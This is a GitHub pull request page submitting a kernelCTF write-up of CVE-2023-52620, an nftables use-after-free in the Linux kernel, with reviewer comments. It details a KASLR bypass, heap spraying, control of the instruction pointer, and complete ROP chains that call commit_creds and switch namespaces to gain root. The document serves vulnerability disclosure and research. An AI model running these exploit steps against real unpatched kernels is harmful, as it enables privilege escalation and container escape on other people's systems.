-
Notifications
You must be signed in to change notification settings - Fork 412
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add kernelCTF CVE-2023-52620_lts_cos_mitigation #117
base: master
Are you sure you want to change the base?
Changes from all commits
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,320 @@ | ||
# Overview | ||
|
||
This vulnerability was found in nftables and was patched in June 2023. However, the patch was mistakenly left out of the LTS version, so the bug remained exploitable in the LTS kernel for 8 months. I therefore reported this to the maintainer so that the patch could be committed to the LTS version. | ||
|
||
The vulnerability arises because a timeout can be set on an anonymous set. As shown in `nf_tables_newset`, nothing rejects an anonymous set when a timeout is specified. | ||
|
||
```c | ||
static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info, | ||
const struct nlattr * const nla[]) | ||
{ | ||
... | ||
desc.timeout = 0; | ||
if (nla[NFTA_SET_TIMEOUT] != NULL) { | ||
if (!(flags & NFT_SET_TIMEOUT)) | ||
return -EINVAL; | ||
|
||
err = nf_msecs_to_jiffies64(nla[NFTA_SET_TIMEOUT], &desc.timeout); | ||
if (err) | ||
return err; | ||
} | ||
... | ||
``` | ||
|
||
Binding an anonymous set to a `lookup expr` and then deleting that expr calls `nf_tables_deactivate_set`. If the set is anonymous, this function calls `nft_map_deactivate` to deactivate the objects mapped to the elements of the set. | ||
|
||
```c | ||
void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set, | ||
struct nft_set_binding *binding, | ||
enum nft_trans_phase phase) | ||
{ | ||
... | ||
case NFT_TRANS_PREPARE: | ||
if (nft_set_is_anonymous(set)) { | ||
if (set->flags & (NFT_SET_MAP | NFT_SET_OBJECT)) | ||
nft_map_deactivate(ctx, set); | ||
|
||
nft_deactivate_next(ctx->net, set); | ||
} | ||
nft_use_dec(&set->use); | ||
return; | ||
... | ||
} | ||
``` | ||
|
||
Then, when the gc is executed in `nft_set_commit_update`, `nft_trans_gc_catchall_sync` calls `nft_setelem_data_deactivate` to deactivate the objects mapped to the set element. As a result, the `nft_chain` or `nft_object` mapped to the set element can be deactivated twice. | ||
|
||
```c | ||
struct nft_trans_gc *nft_trans_gc_catchall_sync(struct nft_trans_gc *gc) | ||
{ | ||
struct nft_set_elem_catchall *catchall, *next; | ||
const struct nft_set *set = gc->set; | ||
struct nft_set_elem elem; | ||
struct nft_set_ext *ext; | ||
|
||
WARN_ON_ONCE(!lockdep_commit_lock_is_held(gc->net)); | ||
|
||
list_for_each_entry_safe(catchall, next, &set->catchall_list, list) { | ||
ext = nft_set_elem_ext(set, catchall->elem); | ||
|
||
if (!nft_set_elem_expired(ext)) | ||
continue; | ||
|
||
gc = nft_trans_gc_queue_sync(gc, GFP_KERNEL); | ||
if (!gc) | ||
return NULL; | ||
|
||
memset(&elem, 0, sizeof(elem)); | ||
elem.priv = catchall->elem; | ||
|
||
nft_setelem_data_deactivate(gc->net, gc->set, &elem); | ||
nft_setelem_catchall_destroy(catchall); | ||
nft_trans_gc_elem_add(gc, elem.priv); | ||
} | ||
|
||
return gc; | ||
} | ||
``` | ||
|
||
# KASLR Bypass and Information Leak | ||
|
||
To bypass KASLR, I used the `struct nft_expr`, which stores the address of the `struct nft_expr_ops`. Since the address of `nft_expr_ops` is a kernel address, we can bypass KASLR by reading it. We can also get the heap address by reading the list in the `struct nft_rule`. This address will be used later to create fake ops and store the ROP payload. In this exploit, I used `nft_counter_ops`. | ||
|
||
```c | ||
struct nft_expr { | ||
const struct nft_expr_ops *ops; | ||
unsigned char data[] | ||
__attribute__((aligned(__alignof__(u64)))); | ||
}; | ||
``` | ||
|
||
```c | ||
struct nft_rule { | ||
struct list_head list; | ||
u64 handle:42, | ||
genmask:2, | ||
dlen:12, | ||
udata:1; | ||
unsigned char data[] | ||
__attribute__((aligned(__alignof__(struct nft_expr)))); | ||
}; | ||
``` | ||
|
||
When the vulnerability is triggered, the reference counter of `nft_chain` is decremented twice. We therefore use an `immediate expr` to create a dangling pointer that references the victim `nft_chain`. After binding the `immediate expr` to the victim `nft_chain`, we trigger the vulnerability to free the victim chain, which leaves the pointer dangling. The name of the freed chain can then be read through the `immediate expr`. We spray `nft_expr` (`kmalloc-cg-16`) and `nft_rule` (`kmalloc-cg-96`) objects over the freed `chain->name` and read back `nft_expr->ops` and `nft_rule->list`, which give us a kernel text address and a `kmalloc-cg-96` heap address, respectively. | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Please mention that |
||
|
||
For the mitigation kernel, we used a timing side channel attack to leak the kernel base, and created a fake ops in the non-randomized CPU entry area (CVE-2023-0597) without leaking the heap address. | ||
|
||
# RIP Control | ||
|
||
```c | ||
struct nft_chain { | ||
struct nft_rule_blob __rcu *blob_gen_0; | ||
struct nft_rule_blob __rcu *blob_gen_1; | ||
struct list_head rules; | ||
struct list_head list; | ||
struct rhlist_head rhlhead; | ||
struct nft_table *table; | ||
u64 handle; | ||
u32 use; | ||
u8 flags:5, | ||
bound:1, | ||
genmask:2; | ||
char *name; | ||
u16 udlen; | ||
u8 *udata; | ||
|
||
/* Only used during control plane commit phase: */ | ||
struct nft_rule_blob *blob_next; | ||
}; | ||
``` | ||
|
||
When the vulnerability is triggered, the freed `chain->blob_gen_0` can be accessed via `immediate expr`. | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. If I understand correctly you are keeping the freed If it is, then please explain these details here. |
||
|
||
```c | ||
unsigned int | ||
nft_do_chain(struct nft_pktinfo *pkt, void *priv) | ||
{ | ||
... | ||
do_chain: | ||
if (genbit) | ||
blob = rcu_dereference(chain->blob_gen_1); | ||
else | ||
blob = rcu_dereference(chain->blob_gen_0); | ||
|
||
rule = (struct nft_rule_dp *)blob->data; | ||
last_rule = (void *)blob->data + blob->size; | ||
next_rule: | ||
regs.verdict.code = NFT_CONTINUE; | ||
for (; rule < last_rule; rule = nft_rule_next(rule)) { | ||
nft_rule_dp_for_each_expr(expr, last, rule) { | ||
if (expr->ops == &nft_cmp_fast_ops) | ||
nft_cmp_fast_eval(expr, &regs); | ||
else if (expr->ops == &nft_cmp16_fast_ops) | ||
nft_cmp16_fast_eval(expr, &regs); | ||
else if (expr->ops == &nft_bitwise_fast_ops) | ||
nft_bitwise_fast_eval(expr, &regs); | ||
else if (expr->ops != &nft_payload_fast_ops || | ||
!nft_payload_fast_eval(expr, &regs, pkt)) | ||
expr_call_ops_eval(expr, &regs, pkt); | ||
|
||
if (regs.verdict.code != NFT_CONTINUE) | ||
break; | ||
} | ||
``` | ||
|
||
```c | ||
static void expr_call_ops_eval(const struct nft_expr *expr, | ||
struct nft_regs *regs, | ||
struct nft_pktinfo *pkt) | ||
{ | ||
#ifdef CONFIG_RETPOLINE | ||
unsigned long e = (unsigned long)expr->ops->eval; | ||
#define X(e, fun) \ | ||
do { if ((e) == (unsigned long)(fun)) \ | ||
return fun(expr, regs, pkt); } while (0) | ||
|
||
X(e, nft_payload_eval); | ||
X(e, nft_cmp_eval); | ||
X(e, nft_counter_eval); | ||
X(e, nft_meta_get_eval); | ||
X(e, nft_lookup_eval); | ||
X(e, nft_range_eval); | ||
X(e, nft_immediate_eval); | ||
X(e, nft_byteorder_eval); | ||
X(e, nft_dynset_eval); | ||
X(e, nft_rt_get_eval); | ||
X(e, nft_bitwise_eval); | ||
#undef X | ||
#endif /* CONFIG_RETPOLINE */ | ||
expr->ops->eval(expr, regs, pkt); | ||
} | ||
``` | ||
|
||
`chain->blob_gen_0` is used in `nft_do_chain`, and `expr->ops->eval` is called in `expr_call_ops_eval` to evaluate the expression. We point the ops of the fake expr at the leaked heap address (LTS, COS) or at the CPU entry area (mitigation) to control RIP. On the LTS and COS kernels, the fake blob object containing the fake expr is allocated in `kmalloc-cg-192`. On the mitigation kernel, we make the fake blob object larger than 0x2000 bytes so that it is allocated by the page allocator. | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Make a comment somewhere why you chose |
||
|
||
# Post-RIP | ||
|
||
The ROP payload is split between `chain->blob_gen_0`, allocated in `kmalloc-cg-192`, and the object at the leaked heap address, allocated in `kmalloc-cg-96`. | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Mention here that on COS Mention that where Also detail the differences between the ROP chains on LTS and COS (as they are different). |
||
|
||
```c | ||
void rop_chain_192(uint64_t* data){ | ||
int i = 0; | ||
|
||
data[i++] = 0x100; | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Comment here what field you are setting. Is it |
||
data[i++] = 0x100; | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Comment here what field you are setting. Is it |
||
|
||
// fake ops addr | ||
data[i++] = kmalloc_96; | ||
|
||
// current = find_task_by_vpid(getpid()) | ||
data[i++] = kbase + POP_RDI_RET; | ||
data[i++] = getpid(); | ||
data[i++] = kbase + FIND_TASK_BY_VPID; | ||
|
||
// current += offsetof(struct task_struct, rcu_read_lock_nesting) | ||
data[i++] = kbase + POP_RSI_RET; | ||
data[i++] = RCU_READ_LOCK_NESTING_OFF; | ||
data[i++] = kbase + ADD_RAX_RSI_RET; | ||
|
||
// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section) | ||
data[i++] = kbase + POP_RCX_RET; | ||
data[i++] = 0; | ||
data[i++] = kbase + MOV_RAX_RCX_RET; | ||
|
||
// commit_creds(&init_cred) | ||
data[i++] = kbase + POP_RDI_RET; | ||
data[i++] = kbase + INIT_CRED; | ||
data[i++] = kbase + COMMIT_CREDS; | ||
|
||
// find_task_by_vpid(1) | ||
data[i++] = kbase + POP_RDI_RET; | ||
data[i++] = 1; | ||
data[i++] = kbase + FIND_TASK_BY_VPID; | ||
|
||
// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) | ||
data[i++] = kbase + MOV_RDI_RAX_RET; | ||
data[i++] = kbase + POP_RSI_RET; | ||
data[i++] = kbase + INIT_NSPROXY; | ||
data[i++] = kbase + SWITCH_TASK_NAMESPACES; | ||
|
||
data[i++] = kbase + POP_RSP_RET; | ||
data[i++] = kmalloc_96 + sizeof(uint64_t); | ||
} | ||
|
||
void rop_chain_96(uint64_t* data){ | ||
int i = 0; | ||
|
||
data[i++] = kbase + PUSH_RBX_POP_RSP; | ||
|
||
data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE; | ||
data[i++] = 0; | ||
data[i++] = 0; | ||
data[i++] = _user_rip; | ||
data[i++] = _user_cs; | ||
data[i++] = _user_rflags; | ||
data[i++] = _user_sp; | ||
data[i++] = _user_ss; | ||
} | ||
``` | ||
|
||
For the mitigation kernel, the ROP payload is stored in `chain->blob_gen_0`, which is allocated by the page allocator. | ||
|
||
```c | ||
void rop_chain(uint64_t* data){ | ||
int i = 0; | ||
|
||
data[i++] = 0x100; | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Comment here what field you are setting. Is it |
||
data[i++] = 0x100; | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Comment here what field you are setting. Is it |
||
data[i++] = PAYLOAD_LOCATION(1) + offsetof(struct cpu_entry_area_payload, nft_expr_eval); | ||
|
||
// current = find_task_by_vpid(getpid()) | ||
data[i++] = kbase + POP_RDI_RET; | ||
data[i++] = getpid(); | ||
data[i++] = kbase + FIND_TASK_BY_VPID; | ||
|
||
// current += offsetof(struct task_struct, rcu_read_lock_nesting) | ||
data[i++] = kbase + POP_RSI_RET; | ||
data[i++] = RCU_READ_LOCK_NESTING_OFF; | ||
data[i++] = kbase + ADD_RAX_RSI_RET; | ||
|
||
// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section) | ||
data[i++] = kbase + POP_RCX_RET; | ||
data[i++] = 0; | ||
data[i++] = kbase + MOV_RAX_RCX_RET; | ||
|
||
// Bypass "schedule while atomic": set oops_in_progress = 1 | ||
data[i++] = kbase + POP_RDI_RET; | ||
data[i++] = 1; | ||
data[i++] = kbase + POP_RSI_RET; | ||
data[i++] = kbase + OOPS_IN_PROGRESS; | ||
data[i++] = kbase + MOV_RSI_RDI_RET; | ||
|
||
// commit_creds(&init_cred) | ||
data[i++] = kbase + POP_RDI_RET; | ||
data[i++] = kbase + INIT_CRED; | ||
data[i++] = kbase + COMMIT_CREDS; | ||
|
||
// find_task_by_vpid(1) | ||
data[i++] = kbase + POP_RDI_RET; | ||
data[i++] = 1; | ||
data[i++] = kbase + FIND_TASK_BY_VPID; | ||
|
||
data[i++] = kbase + POP_RSI_RET; | ||
data[i++] = 0; | ||
|
||
// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) | ||
data[i++] = kbase + MOV_RDI_RAX_RET; | ||
data[i++] = kbase + POP_RSI_RET; | ||
data[i++] = kbase + INIT_NSPROXY; | ||
data[i++] = kbase + SWITCH_TASK_NAMESPACES; | ||
|
||
data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE; | ||
data[i++] = 0; | ||
data[i++] = 0; | ||
data[i++] = _user_rip; | ||
data[i++] = _user_cs; | ||
data[i++] = _user_rflags; | ||
data[i++] = _user_sp; | ||
data[i++] = _user_ss; | ||
} | ||
``` |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Can you comment here more about how the reference counter of the `nft_chain` object changes? Let's consider the `chain_leak`: you use it for the `immediate` expr, so the ref. counter becomes 1, then you set up the anonymous set and the lookup expression for the chain (ref count becomes 2), and then you wait for the timeout (ref count becomes 1), and then how is the lookup expression destroyed? Is it during the `del_chain` call? If yes, then the ref count becomes 0 at this point but the `immediate` expr is still referencing the `nft_chain` object?